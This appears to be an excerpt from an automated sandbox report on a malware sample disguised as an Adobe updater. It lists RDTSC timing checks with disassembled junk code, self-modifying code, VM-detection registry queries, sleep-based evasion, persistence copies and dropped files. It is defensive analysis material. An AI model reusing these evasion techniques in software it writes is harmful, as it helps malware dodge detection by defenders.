Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10F1A second address: 4F10F5D instructions: 0x00000000 rdtsc 0x00000002 movsx edi, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F09D0731CB0h 0x0000000d xor ecx, 09DB8DC8h 0x00000013 jmp 00007F09D0731CABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F09D0731CB5h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10F5D second address: 4F10F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10F63 second address: 4F10F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F1045E second address: 4F10466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10466 second address: 4F10475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E200CC second address: 4E200D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E200D0 second address: 4E200D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E200D6 second address: 4E200DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E200DC second address: 4E200E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E200E0 second address: 4E20166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F09D0D9C3E9h 0x00000010 or eax, 760CE7D6h 0x00000016 jmp 00007F09D0D9C3E1h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F09D0D9C3E0h 0x00000022 and ax, D5F8h 0x00000027 jmp 00007F09D0D9C3DBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 mov dh, ch 0x00000032 jmp 00007F09D0D9C3E1h 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F09D0D9C3DDh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40BB8 second address: 4E40BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F09D0731CB1h 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e movzx esi, bx 0x00000011 mov cl, bl 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40BE0 second address: 4E40BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40BE4 second address: 4E40C01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E40C01 second address: 4E40C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E60DCA second address: 4E60DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0731CB5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E60DF1 second address: 4E60DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E60DF7 second address: 4E60DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E60DFB second address: 4E60E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E60E1A second address: 4E60E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E60E22 second address: 4E60E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007F09D0D9C3DCh 0x00000011 mov bl, ah 0x00000013 pop edi 0x00000014 push ecx 0x00000015 jmp 00007F09D0D9C3E3h 0x0000001a pop esi 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E60E5B second address: 4E60E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E60E5F second address: 4E60E6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10AC4 second address: 4F10AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10AC8 second address: 4F10ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10ACE second address: 4F10AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, cx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10AE7 second address: 4F10B1A instructions: 0x00000000 rdtsc 0x00000002 mov ah, E8h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F09D0D9C3DEh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F09D0D9C3E7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10B1A second address: 4F10B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bh, cl 0x0000000e pushfd 0x0000000f jmp 00007F09D0731CB9h 0x00000014 sbb si, F076h 0x00000019 jmp 00007F09D0731CB1h 0x0000001e popfd 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10B75 second address: 4F10B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10B79 second address: 4F10B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F104BB second address: 4F104C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F104C0 second address: 4F104D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, ebx 0x00000012 mov edi, 6A894264h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F104D8 second address: 4F104DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F104DE second address: 4F104E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F104E2 second address: 4F104E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F104E6 second address: 4F104F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F104F6 second address: 4F104FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F104FC second address: 4F10533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F09D0731CB9h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10533 second address: 4F10537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10537 second address: 4F1053D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F1053D second address: 4F1058A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F09D0D9C3D9h 0x0000000e jmp 00007F09D0D9C3E0h 0x00000013 push eax 0x00000014 pushad 0x00000015 mov dh, 25h 0x00000017 pushad 0x00000018 mov ebx, esi 0x0000001a mov al, 50h 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F09D0D9C3DDh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10619 second address: 4F1062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F1062B second address: 4F10667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d jmp 00007F09D0D9C3DCh 0x00000012 inc edi 0x00000013 jmp 00007F09D0D9C3E0h 0x00000018 and dword ptr [ebp-04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F09D0D9C3DAh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10667 second address: 4F10676 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10676 second address: 4F1067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F1067C second address: 4F10680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10680 second address: 4F10684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10684 second address: 4F1069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0731CAAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F1069A second address: 4F10706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0A4192EDE8h 0x0000000f jmp 00007F09D0D9C3E6h 0x00000014 lea eax, dword ptr [ebp-00000110h] 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e mov dh, 04h 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F09D0D9C3E7h 0x0000002a jmp 00007F09D0D9C3E8h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10774 second address: 4F107EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 jmp 00007F09D0731CABh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f pushad 0x00000010 mov dh, ch 0x00000012 pushfd 0x00000013 jmp 00007F09D0731CB1h 0x00000018 and eax, 6B884E16h 0x0000001e jmp 00007F09D0731CB1h 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007F0A412C45B2h 0x0000002b jmp 00007F09D0731CAEh 0x00000030 mov eax, dword ptr [ebp-00000110h] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F09D0731CB7h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F107EA second address: 4F107F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F107F0 second address: 4F10822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebx], eax 0x0000000a jmp 00007F09D0731CB7h 0x0000000f lea ecx, dword ptr [ebp-0000010Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dx, A236h 0x0000001c movsx edi, si 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10871 second address: 4F108B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F09D0D9C3DEh 0x00000010 je 00007F0A4192EBFBh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F09D0D9C3DDh 0x0000001e movzx ecx, di 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F108B8 second address: 4F10944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F09D0731CB0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F09D0731CB1h 0x00000017 or ecx, 6C0E73C6h 0x0000001d jmp 00007F09D0731CB1h 0x00000022 popfd 0x00000023 mov eax, 71A7A877h 0x00000028 popad 0x00000029 nop 0x0000002a pushad 0x0000002b mov ah, 2Fh 0x0000002d mov ebx, 147D1C68h 0x00000032 popad 0x00000033 lea ecx, dword ptr [ebx+04h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dx, ax 0x0000003c pushfd 0x0000003d jmp 00007F09D0731CB4h 0x00000042 or ecx, 101EEEC8h 0x00000048 jmp 00007F09D0731CABh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10944 second address: 4F1094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4F10A6E second address: 4F10A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Special instruction interceptor: First address: 8F865B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Special instruction interceptor: First address: 921F14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Special instruction interceptor: First address: 75F912 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Special instruction interceptor: First address: 90A742 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Special instruction interceptor: First address: 98762D instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: D8865B instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: DB1F14 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: BEF912 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: D9A742 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: E1762D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: 89865B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: 8C1F14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: 6FF912 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: 8AA742 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: 92762D instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Code function: 0_2_04F1074F rdtsc

0_2_04F1074F

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window / User API: threadDelayed 1372	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window / User API: threadDelayed 430	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window / User API: threadDelayed 6206	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1565	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1121	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1114	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1574	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1116	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1138	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 462	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1071	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1233	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1244	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 366	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 369	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 478	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 5627	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Evaded block: after key decision

graph_15-1168

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-1074

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6472	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6472	Thread sleep time: -82041s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104	Thread sleep count: 1372 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104	Thread sleep time: -2745372s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6596	Thread sleep count: 63 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6500	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6500	Thread sleep time: -100050s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6276	Thread sleep count: 160 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6276	Thread sleep time: -320160s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6596	Thread sleep count: 430 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6596	Thread sleep time: -43000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 7288	Thread sleep count: 210 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6428	Thread sleep count: 166 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6428	Thread sleep time: -332166s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 7288	Thread sleep count: 239 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104	Thread sleep count: 6206 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104	Thread sleep time: -12418206s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7480	Thread sleep count: 94 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7480	Thread sleep time: -188094s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7464	Thread sleep count: 121 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7464	Thread sleep time: -242121s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7660	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7420	Thread sleep count: 1565 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7420	Thread sleep time: -156500s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7724	Thread sleep count: 1121 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7452	Thread sleep count: 106 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7452	Thread sleep time: -212106s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7724	Thread sleep count: 1114 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7724	Thread sleep time: -111400s >= -30000s	Jump to behavior
